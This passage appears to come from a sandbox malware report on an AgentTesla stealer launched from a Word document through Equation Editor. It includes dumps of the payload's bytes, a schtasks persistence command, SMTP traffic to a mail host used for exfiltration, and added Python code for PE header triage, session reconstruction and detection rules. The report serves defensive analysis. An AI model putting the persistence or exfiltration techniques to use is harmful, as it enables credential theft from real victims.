2a 00 01 10 00 00 02 00 01 00 0e 0f 00 02 00 00 00 00 aa 00 02 16 28 22 00 00 0a 00 02 16 28 23 00 00 0a 00 02 17 28 24 00 00 0a 00 02 16 28 25 00 00 0a 00 02 16 28 26 00 00 0a 00 2a 4e 00 02 28 09 00 00 06 6f ed 00 00 06 28 27 00 00 0a 00 2a 26 00 02 28 28 00 00 0a 00 2a ce 73 29 00 00 0a 80 01 00 00 04 73 2a 00 00 0a 80 02 00 00 04 73 2b 00 00 0a 80 03 00 00 04 73 2c 00 00 0a 80 04 00 00 04 73 2d 00 00 0a 80 05 00 00 04 2a 00 00 00 13 30 01 00 10 00 00 00 01 00 00 11 00 7e 01 00 00 04 6f 2e 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 02 00 00 11 00 7e 02 00 00 04 6f 2f 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 03 00 00 11 00 7e 03 00 00 04 6f 30 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 04 00 00 11 00 7e 04 00 00 04 6f 31 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 05 00 00 11 00 7e 05 00 00 04 6f 32 00 00 0a 0a 2b 00 06 2a 13 30 02 00 3c 00 00 00 06 00 00 11 00 7e 06 00 00 04 14 28 33 00 00 0a 0b 07 2c 21 72 01 00 00 70 d0 05 00 00 02 28 34 00 00 0a 6f 35 00 00 0a 73 36 00 00 0a 0c 08 80 06 00 00 04 00 00 7e 06 00 00 04 0a 2b 00 06 2a 13 30 01 00 0b 00 00 00 07 00 00 11 00 7e 07 00 00 04 0a 2b 00 06 2a 22 00 02 80 07 00 00 04 2a 13 30 03 00 26 00 00 00 08 00 00 11 00 28 0b 00 00 06 72 27 00 00 70 7e 07 00 00 04 6f 37 00 00 0a 28 38 00
                                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELs`PL> @ @O H H.textD `.rsrcH J@@.reloc.@B H$}v<0(( (o!*("(#($(%(&*N(o('*&((*s)s*s+s,s-*0~o.+*0~o/+*0~o0+*0~o1+*0~o2+*0<~(3,!rp(4o5s6~+*0~+*"*0&(r'p~o7(8
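The body of that 200 response starts with an MZ/PE header, and the first few hundred bytes are enough to triage the download before the whole file is carved from the capture. The following is an added example by the editor, not code from the Joe Sandbox report: it parses the leading 0x230 bytes of the "Data Raw" dump above (transcribed from this page), walks the DOS header, COFF header, PE32 optional header, data directories and section table, and reads the CLR header that marks the file as .NET. The function names, the "expected file size" check (end of the last section's raw data) and the decision to stop at PE32 are the editor's choices; the byte values are the page's.

```python
import struct
from datetime import datetime, timezone

# Leading 0x230 bytes of the response body from the "Data Raw" row above
# (GET /docxxx/dec/ZhIOjFmINIXbKXm.exe), transcribed from the report; only the
# headers are needed for triage, so the rest of the 733184-byte body is omitted.
SAMPLE_HEADER = bytes.fromhex("""
4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00
b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00
0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68
69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f
74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20
6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00
50 45 00 00 4c 01 03 00 aa d6 73 60 00 00 00 00
00 00 00 00 e0 00 02 01 0b 01 50 00 00 e2 0a 00
00 4c 00 00 00 00 00 00 3e 00 0b 00 00 20 00 00
00 20 0b 00 00 00 40 00 00 20 00 00 00 02 00 00
04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00
00 a0 0b 00 00 02 00 00 00 00 00 00 02 00 40 85
00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00
00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00
ec ff 0a 00 4f 00 00 00 00 20 0b 00 e8 48 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 80 0b 00 0c 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00
00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00
00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00
44 e0 0a 00 00 20 00 00 00 e2 0a 00 00 02 00 00
00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60
2e 72 73 72 63 00 00 00 e8 48 00 00 00 20 0b 00
00 4a 00 00 00 e4 0a 00 00 00 00 00 00 00 00 00
00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00
0c 00 00 00 00 80 0b 00 00 02 00 00 00 2e 0b 00
00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
20 00 0b 00 00 00 00 00 48 00 00 00 02 00 05 00
24 7d 00 00 18 76 00 00 03 00 00 00 01 00 00 06
3c f3 00 00 b0 0c 0a 00 00 00 00 00 00 00 00 00
""")

COM_DESCRIPTOR = 14  # data-directory slot that holds the CLR (.NET) header


def rva_to_offset(rva, sections):
    """Translate an RVA into a file offset using the section table."""
    for s in sections:
        if s["va"] <= rva < s["va"] + max(s["vsize"], s["rawsize"]):
            return rva - s["va"] + s["rawptr"]
    return None


def parse_pe_header(buf):
    """Triage a PE32 image from its first few hundred bytes; raises on malformed input."""
    if buf[:2] != b"MZ":
        raise ValueError("no MZ signature")
    e_lfanew = struct.unpack_from("<I", buf, 0x3C)[0]
    if buf[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature at e_lfanew")
    machine, nsect, ts, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", buf, e_lfanew + 4)
    opt = e_lfanew + 24                      # optional header follows the 20-byte COFF header
    if struct.unpack_from("<H", buf, opt)[0] != 0x10B:
        raise ValueError("only PE32 handled here; PE32+ shifts the fields below")
    entry = struct.unpack_from("<I", buf, opt + 16)[0]
    n_dirs = struct.unpack_from("<I", buf, opt + 92)[0]
    dirs = [struct.unpack_from("<II", buf, opt + 96 + 8 * i) for i in range(min(n_dirs, 16))]
    sections = []
    for i in range(nsect):
        base = opt + opt_size + 40 * i
        name = buf[base:base + 8].rstrip(b"\0").decode("ascii", "replace")
        vsize, va, rawsize, rawptr = struct.unpack_from("<IIII", buf, base + 8)
        sections.append({"name": name, "vsize": vsize, "va": va, "rawsize": rawsize, "rawptr": rawptr})
    info = {
        "machine": machine,                  # 0x14c = i386
        "compiled": datetime.fromtimestamp(ts, timezone.utc).isoformat(),
        "entry_point": entry,
        "sections": [s["name"] for s in sections],
        # Where the last section's raw data ends is how long a well-formed file must be;
        # compare it with Content-Length before trusting a body carved from the pcap.
        "expected_file_size": max(s["rawptr"] + s["rawsize"] for s in sections),
        "clr": None,
    }
    if len(dirs) > COM_DESCRIPTOR and dirs[COM_DESCRIPTOR][0]:
        off = rva_to_offset(dirs[COM_DESCRIPTOR][0], sections)
        if off is not None and off + 32 <= len(buf):
            _, maj, mnr, _, _, flags, token, _, res_size = struct.unpack_from("<IHHIIIIII", buf, off)
            info["clr"] = {"runtime": f"{maj}.{mnr}", "il_only": bool(flags & 1),
                           "entry_token": token, "resource_bytes": res_size}
    return info


if __name__ == "__main__":
    for key, value in parse_pe_header(SAMPLE_HEADER).items():
        print(f"{key}: {value}")
```

Run against these bytes the parser reports a 32-bit, IL-only .NET executable with three sections whose raw data ends at 733184 bytes, exactly the Content-Length in the response and the size of the dropped rghbyjuyktyjrthbgvfsfhytrrgfsd.exe in the System Behavior section. The link-time stamp decodes to 2021-04-12 05:12:10 UTC, under three minutes before the server's Last-Modified of 05:14:50 GMT, and the CLR header declares 0xa0cb0 (658608) bytes of managed resources, close to 90% of the file, which is where a loader of this kind usually keeps its next stage and is the first place to look when unpacking.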


SMTP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
Apr 12, 2021 14:23:38.101613998 CEST | 587 | 49168 | 198.54.122.60 | 192.168.2.22 | 220 PrivateEmail.com Mail Node
Apr 12, 2021 14:23:38.102071047 CEST | 49168 | 587 | 192.168.2.22 | 198.54.122.60 | EHLO 116938
Apr 12, 2021 14:23:38.297205925 CEST | 587 | 49168 | 198.54.122.60 | 192.168.2.22 | 250-MTA-05.privateemail.com
    250-PIPELINING
    250-SIZE 81788928
    250-ETRN
    250-AUTH PLAIN LOGIN
    250-ENHANCEDSTATUSCODES
    250-8BITMIME
    250 STARTTLS
Apr 12, 2021 14:23:38.321805000 CEST | 49168 | 587 | 192.168.2.22 | 198.54.122.60 | STARTTLS
Apr 12, 2021 14:23:38.516220093 CEST | 587 | 49168 | 198.54.122.60 | 192.168.2.22 | 220 Ready to start TLS
Apr 12, 2021 14:23:45.779499054 CEST | 587 | 49169 | 198.54.122.60 | 192.168.2.22 | 220 PrivateEmail.com Mail Node
Apr 12, 2021 14:23:45.779845953 CEST | 49169 | 587 | 192.168.2.22 | 198.54.122.60 | EHLO 116938
Apr 12, 2021 14:23:45.978158951 CEST | 587 | 49169 | 198.54.122.60 | 192.168.2.22 | 250-MTA-05.privateemail.com
    250-PIPELINING
    250-SIZE 81788928
    250-ETRN
    250-AUTH PLAIN LOGIN
    250-ENHANCEDSTATUSCODES
    250-8BITMIME
    250 STARTTLS
Apr 12, 2021 14:23:45.978430033 CEST | 49169 | 587 | 192.168.2.22 | 198.54.122.60 | STARTTLS
Apr 12, 2021 14:23:46.176167965 CEST | 587 | 49169 | 198.54.122.60 | 192.168.2.22 | 220 Ready to start TLS
Apr 12, 2021 14:23:54.851526976 CEST | 587 | 49171 | 198.54.122.60 | 192.168.2.22 | 220 PrivateEmail.com Mail Node
Apr 12, 2021 14:23:54.851766109 CEST | 49171 | 587 | 192.168.2.22 | 198.54.122.60 | EHLO 116938
Apr 12, 2021 14:23:55.047741890 CEST | 587 | 49171 | 198.54.122.60 | 192.168.2.22 | 250-MTA-05.privateemail.com
    250-PIPELINING
    250-SIZE 81788928
    250-ETRN
    250-AUTH PLAIN LOGIN
    250-ENHANCEDSTATUSCODES
    250-8BITMIME
    250 STARTTLS
Apr 12, 2021 14:23:55.048083067 CEST | 49171 | 587 | 192.168.2.22 | 198.54.122.60 | STARTTLS
Apr 12, 2021 14:23:55.244251966 CEST | 587 | 49171 | 198.54.122.60 | 192.168.2.22 | 220 Ready to start TLS
Apr 12, 2021 14:24:05.793168068 CEST | 587 | 49172 | 198.54.122.60 | 192.168.2.22 | 220 PrivateEmail.com Mail Node
Apr 12, 2021 14:24:05.793556929 CEST | 49172 | 587 | 192.168.2.22 | 198.54.122.60 | EHLO 116938
Apr 12, 2021 14:24:05.988888979 CEST | 587 | 49172 | 198.54.122.60 | 192.168.2.22 | 250-MTA-05.privateemail.com
    250-PIPELINING
    250-SIZE 81788928
    250-ETRN
    250-AUTH PLAIN LOGIN
    250-ENHANCEDSTATUSCODES
    250-8BITMIME
    250 STARTTLS
Apr 12, 2021 14:24:05.989166021 CEST | 49172 | 587 | 192.168.2.22 | 198.54.122.60 | STARTTLS
Apr 12, 2021 14:24:06.182907104 CEST | 587 | 49172 | 198.54.122.60 | 192.168.2.22 | 220 Ready to start TLS
Apr 12, 2021 14:24:12.003307104 CEST | 587 | 49173 | 198.54.122.60 | 192.168.2.22 | 220 PrivateEmail.com Mail Node
Apr 12, 2021 14:24:12.003797054 CEST | 49173 | 587 | 192.168.2.22 | 198.54.122.60 | EHLO 116938
Apr 12, 2021 14:24:12.204090118 CEST | 587 | 49173 | 198.54.122.60 | 192.168.2.22 | 250-MTA-05.privateemail.com
    250-PIPELINING
    250-SIZE 81788928
    250-ETRN
    250-AUTH PLAIN LOGIN
    250-ENHANCEDSTATUSCODES
    250-8BITMIME
    250 STARTTLS
Apr 12, 2021 14:24:12.204479933 CEST | 49173 | 587 | 192.168.2.22 | 198.54.122.60 | STARTTLS
Apr 12, 2021 14:24:12.404401064 CEST | 587 | 49173 | 198.54.122.60 | 192.168.2.22 | 220 Ready to start TLS
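Five separate submissions to mail.privateemail.com in 34 seconds, each one greeting, EHLO, STARTTLS and nothing more in clear text, is the shape of a stealer's SMTP exfiltration as a packet capture sees it: everything that would identify the mailbox (the AUTH exchange) and the stolen data (the message body) happens after the 220 "Ready to start TLS" and is not in the pcap. The following is an added example by the editor, not part of the report or of Joe Security's tooling: it reconstructs the sessions from the rows above (transcribed from this page, timestamps truncated to milliseconds) and applies three heuristics. The function names, the session representation and the heuristics themselves are the editor's.

```python
from datetime import datetime

# The server's EHLO response, identical in all five sessions above.
EHLO_REPLY = ("250-MTA-05.privateemail.com\n250-PIPELINING\n250-SIZE 81788928\n250-ETRN\n"
              "250-AUTH PLAIN LOGIN\n250-ENHANCEDSTATUSCODES\n250-8BITMIME\n250 STARTTLS")

# SMTP rows from the report above as (time, src_port, dst_port, text). Timestamps are
# truncated to milliseconds and the IPs dropped, since the ports identify each side.
SMTP_ROWS = [
    ("14:23:38.101", 587, 49168, "220 PrivateEmail.com Mail Node"),
    ("14:23:38.102", 49168, 587, "EHLO 116938"),
    ("14:23:38.297", 587, 49168, EHLO_REPLY),
    ("14:23:38.321", 49168, 587, "STARTTLS"),
    ("14:23:38.516", 587, 49168, "220 Ready to start TLS"),
    ("14:23:45.779", 587, 49169, "220 PrivateEmail.com Mail Node"),
    ("14:23:45.779", 49169, 587, "EHLO 116938"),
    ("14:23:45.978", 587, 49169, EHLO_REPLY),
    ("14:23:45.978", 49169, 587, "STARTTLS"),
    ("14:23:46.176", 587, 49169, "220 Ready to start TLS"),
    ("14:23:54.851", 587, 49171, "220 PrivateEmail.com Mail Node"),
    ("14:23:54.851", 49171, 587, "EHLO 116938"),
    ("14:23:55.047", 587, 49171, EHLO_REPLY),
    ("14:23:55.048", 49171, 587, "STARTTLS"),
    ("14:23:55.244", 587, 49171, "220 Ready to start TLS"),
    ("14:24:05.793", 587, 49172, "220 PrivateEmail.com Mail Node"),
    ("14:24:05.793", 49172, 587, "EHLO 116938"),
    ("14:24:05.988", 587, 49172, EHLO_REPLY),
    ("14:24:05.989", 49172, 587, "STARTTLS"),
    ("14:24:06.182", 587, 49172, "220 Ready to start TLS"),
    ("14:24:12.003", 587, 49173, "220 PrivateEmail.com Mail Node"),
    ("14:24:12.003", 49173, 587, "EHLO 116938"),
    ("14:24:12.204", 587, 49173, EHLO_REPLY),
    ("14:24:12.204", 49173, 587, "STARTTLS"),
    ("14:24:12.404", 587, 49173, "220 Ready to start TLS"),
]

SUBMISSION_PORT = 587


def _ts(s):
    return datetime.strptime(s, "%H:%M:%S.%f")


def reconstruct_sessions(rows, server_port=SUBMISSION_PORT):
    """Group rows by client port and record what each session negotiated in clear text."""
    sessions = {}
    for ts, sport, dport, text in rows:
        client_port = dport if sport == server_port else sport
        s = sessions.setdefault(client_port, {
            "client_port": client_port, "start": ts, "end": ts, "ehlo": None,
            "auth_offered": [], "starttls_requested": False, "starttls": False})
        s["end"] = ts
        if sport == client_port:                       # client -> server
            verb, _, arg = text.partition(" ")
            if verb.upper() == "EHLO":
                s["ehlo"] = arg
            elif verb.upper() == "STARTTLS":
                s["starttls_requested"] = True
        else:                                          # server -> client
            for line in text.splitlines():
                if line[:4] in ("250-", "250 ") and line[4:].startswith("AUTH "):
                    s["auth_offered"] = line[9:].split()
                if line.startswith("220 ") and s["starttls_requested"]:
                    s["starttls"] = True               # from here on the pcap is opaque
    return list(sessions.values())


def assess(sessions):
    """Heuristics a responder would apply to the reconstructed sessions."""
    findings = []
    span = (_ts(sessions[-1]["end"]) - _ts(sessions[0]["start"])).total_seconds()
    if len(sessions) >= 3:
        findings.append(f"{len(sessions)} submission sessions to port {SUBMISSION_PORT} within {span:.1f}s")
    for name in sorted({s["ehlo"] for s in sessions if s["ehlo"]}):
        if "." not in name:
            findings.append(f"EHLO argument {name!r} is a bare host name, not an FQDN")
    if sessions and all(s["starttls"] for s in sessions):
        findings.append("every session upgraded to TLS; AUTH and message content are not in the capture")
    return findings


if __name__ == "__main__":
    for finding in assess(reconstruct_sessions(SMTP_ROWS)):
        print(finding)
```

None of the three findings is conclusive on its own: a desktop mail client also sends its machine name in EHLO and also upgrades to TLS on port 587. What makes these sessions an exfiltration channel is the process behind them, a binary dropped by Equation Editor rather than a mail client, and that attribution has to come from the host side (the System Behavior section below), not from the packets. Since the credentials are negotiated under TLS, recovering the mailbox used for collection needs either the sample's configuration or a TLS-intercepting sandbox, not this pcap.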

                                                                                      Code Manipulations

                                                                                      Statistics

                                                                                      Behavior

                                                                                      System Behavior

General

Start time: 14:22:36
Start date: 12/04/2021
Path: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit): false
Commandline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Imagebase: 0x13f480000
File size: 1424032 bytes
MD5 hash: 95C38D04597050285A18F66039EDB456
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 14:22:37
Start date: 12/04/2021
Path: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit): true
Commandline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Imagebase: 0x400000
File size: 543304 bytes
MD5 hash: A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 14:22:39
Start date: 12/04/2021
Path: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe
Imagebase: 0x1360000
File size: 733184 bytes
MD5 hash: F5F1E2A3E5DCE186EED0352350911887
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.2097158803.000000000285E000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.2097947633.00000000039FD000.00000004.00000001.sdmp, Author: Joe Security
Antivirus matches:
• Detection: 100%, Joe Sandbox ML
Reputation: low

General

Start time: 14:22:43
Start date: 12/04/2021
Path: C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit): true
Commandline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\cAFIUeWyVQPJe' /XML 'C:\Users\user\AppData\Local\Temp\tmpBFD6.tmp'
Imagebase: 0x340000
File size: 179712 bytes
MD5 hash: 2003E9B15E1C502B146DAD2E383AC1E3
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 14:22:44
Start date: 12/04/2021
Path: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe
Imagebase: 0x1360000
File size: 733184 bytes
MD5 hash: F5F1E2A3E5DCE186EED0352350911887
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.2350771035.0000000002BBE000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.2349110341.0000000002821000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2349110341.0000000002821000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.2347727555.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
Reputation: low

General

Start time: 14:22:57
Start date: 12/04/2021
Path: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit): true
Commandline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Imagebase: 0x400000
File size: 543304 bytes
MD5 hash: A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
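Read in start order, the six records above are the whole infection chain: WINWORD.EXE loads the document, EQNEDT32.EXE is started for an embedded equation object, a low-reputation .NET binary appears in AppData\Roaming two seconds later, schtasks.exe registers a task named Updates\cAFIUeWyVQPJe from an XML file in the user's Temp directory, and a second copy of the same binary starts one second after that with a Yara hit inside its own image region. The following is an added example by the editor, not Joe Security's detection code: it reduces these records to the fields the rules need (transcribed from this page) and runs four rules over them. The rule names, the regular expressions and the 10-second relaunch window are the editor's; the relaunch rule is a heuristic, since these records carry no parent/child process ids to confirm who started the second copy.

```python
import re
from datetime import datetime

# Process records from the "System Behavior" section above, reduced to the fields the
# rules need. Transcribed from the report; "yara" is the number of Yara matches listed.
RECORDS = [
    {"start": "14:22:36", "path": r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE",
     "cmd": r"'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding",
     "reputation": "high", "yara": 0},
    {"start": "14:22:37", "path": r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     "cmd": r"'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding",
     "reputation": "high", "yara": 0},
    {"start": "14:22:39", "path": r"C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe",
     "cmd": r"C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe",
     "reputation": "low", "yara": 2},
    {"start": "14:22:43", "path": r"C:\Windows\SysWOW64\schtasks.exe",
     "cmd": r"'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\cAFIUeWyVQPJe' /XML 'C:\Users\user\AppData\Local\Temp\tmpBFD6.tmp'",
     "reputation": "high", "yara": 0},
    {"start": "14:22:44", "path": r"C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe",
     "cmd": r"C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe",
     "reputation": "low", "yara": 4},
    {"start": "14:22:57", "path": r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     "cmd": r"'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding",
     "reputation": "high", "yara": 0},
]

CREATE_RE = re.compile(r"schtasks\.exe'?\s+/create\b", re.IGNORECASE)
XML_RE = re.compile(r"/xml\s+'?([^'\s]+)", re.IGNORECASE)
ROAMING_RE = re.compile(r"\\AppData\\Roaming\\", re.IGNORECASE)


def _t(hhmmss):
    return datetime.strptime(hhmmss, "%H:%M:%S")


def evaluate(records, relaunch_window_s=10):
    """Run the rules over the records in start order; returns (rule, start time, image) triples."""
    findings = []
    last_start = {}                                    # image path -> most recent start time
    for r in sorted(records, key=lambda rec: _t(rec["start"])):
        image = r["path"].rsplit("\\", 1)[-1].lower()
        if image == "eqnedt32.exe":
            # Equation Editor only runs because a document embedded an OLE object for it.
            findings.append(("equation_editor_spawned", r["start"], image))
        if ROAMING_RE.search(r["path"]) and r["reputation"] == "low":
            findings.append(("low_reputation_binary_in_roaming", r["start"], image))
        xml = XML_RE.search(r["cmd"])
        if CREATE_RE.search(r["cmd"]) and xml and "\\temp\\" in xml.group(1).lower():
            findings.append(("schtasks_create_from_temp_xml", r["start"], image))
        prev = last_start.get(r["path"].lower())
        if (prev is not None and r["yara"]
                and (_t(r["start"]) - _t(prev)).total_seconds() <= relaunch_window_s):
            # Heuristic: a second copy of a flagged binary seconds after the first is the
            # shape a self-injecting loader leaves behind; parent/child ids would confirm it.
            findings.append(("dropped_binary_relaunched", r["start"], image))
        last_start[r["path"].lower()] = r["start"]
    return findings


if __name__ == "__main__":
    for rule, start, image in evaluate(RECORDS):
        print(f"{start}  {rule:36}  {image}")
```

The schtasks rule is the one worth carrying into production telemetry: a task created with /XML from a path under Temp is rare in legitimate administration and survives renaming of the dropped binary. Note that it keys on the command line the report shows (System32\schtasks.exe) rather than the image actually loaded (SysWOW64\schtasks.exe, because the 32-bit parent was redirected), so match on the command line, not the path, when porting it.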

                                                                                      Disassembly

                                                                                      Code Analysis
